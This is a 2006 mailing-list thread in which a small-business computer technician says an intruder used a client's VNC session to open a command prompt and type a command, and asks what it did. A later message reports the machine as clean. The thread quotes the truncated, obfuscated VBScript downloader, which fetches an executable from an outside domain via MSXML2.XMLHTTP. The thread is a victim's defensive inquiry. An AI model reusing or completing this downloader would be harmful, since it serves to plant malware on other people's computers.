Thanks to all who offered assistance. Her machine has been upgraded
and scanned with three different AV products. She appears to be clean.
Chris Curtis
On Sep 27, 2006, at 3:31 PM, Chris Curtis wrote:
> Hello All. This is very off topic, but I figure it won't kill anyone
> if I ask. There are a number of very smart cookies on this list, and
> I bet someone out there can enlighten me.
>
> Today I got a call from one off my customers who runs VNC for remote
> support access. She was working away, and suddenly her mouse
> started to move, it opened up a CMD session (it's really a DOS
> session, but we aren't supposed to know that Windows is just another
> DOS app are we!!!) and it typed the following:
>
> C:\Documents and Settings\sales>CD %TMP%&ECHO On ERROR RESUmE
> nExt:F="L.eXe":SEt
> p=cREAtEOBjEct("mSxmL2.xmLhttp"):p.OpEn"gEt","HtTp://WwW.JmDoNgyI.CoM/
> NETSTAT
> On ERROR RESUmE nExt:F="L.eXe":SEt p=cREAtEOBjEct
> ("mSxmL2.xmLhttp"):p.OpEn"gEt",
> "HtTp://WwW.JmDoNgyI.CoM/
>
> Now, I am not an XML guy, but it looks to me like this person was
> trying to use XML and download content from a likely infected
> website. I went to the website (I use a MAC, so I don't generally
> worry about getting a browser hack) and, you guessed it, it was a
> Chinese site. I googled the www.jmdongyi.com name but got no hits.
>
> I connected to her PC and found no strange connections to it at the
> time. I ran a malware, virus scan and it was clean also. I had her
> turn off vnc for now and explained to her how she could turn it on
> when she needs to allow someone access. Incidentally, she was using
> a non dictionary password with alpha and numeric characters.
>
> My question is, what was the XML string actually trying to do.
>
> Thanks to all who offer assistance.
>
>
>
>
> Chris Curtis
> Sandpoint Computers
> Office 208-265-1608
> Cell 208-610-3062
>
>
> ----------------------------------------------------------------------
> ---
> Take Surveys. Earn Cash. Influence the Future of IT
> Join SourceForge.net's Techsay panel and you'll get the chance to
> share your
> opinions on IT & business topics through brief surveys -- and earn
> cash
> http://www.techsay.com/default.php?
> page=join.php&p=sourceforge&CID=DEVDEV
> _______________________________________________
> sql-ledger-users mailing list
> [email protected]
> https://lists.sourceforge.net/lists/listinfo/sql-ledger-users
Chris Curtis
Sandpoint Computers
Office 208-265-1608
Cell 208-610-3062
-------------------------------------------------------------------------
Take Surveys. Earn Cash. Influence the Future of IT
Join SourceForge.net's Techsay panel and you'll get the chance to share your
opinions on IT & business topics through brief surveys -- and earn cash
http://www.techsay.com/default.php?page=join.php&p=sourceforge&CID=DEVDEV
_______________________________________________
sql-ledger-users mailing list
[email protected]
https://lists.sourceforge.net/lists/listinfo/sql-ledger-users
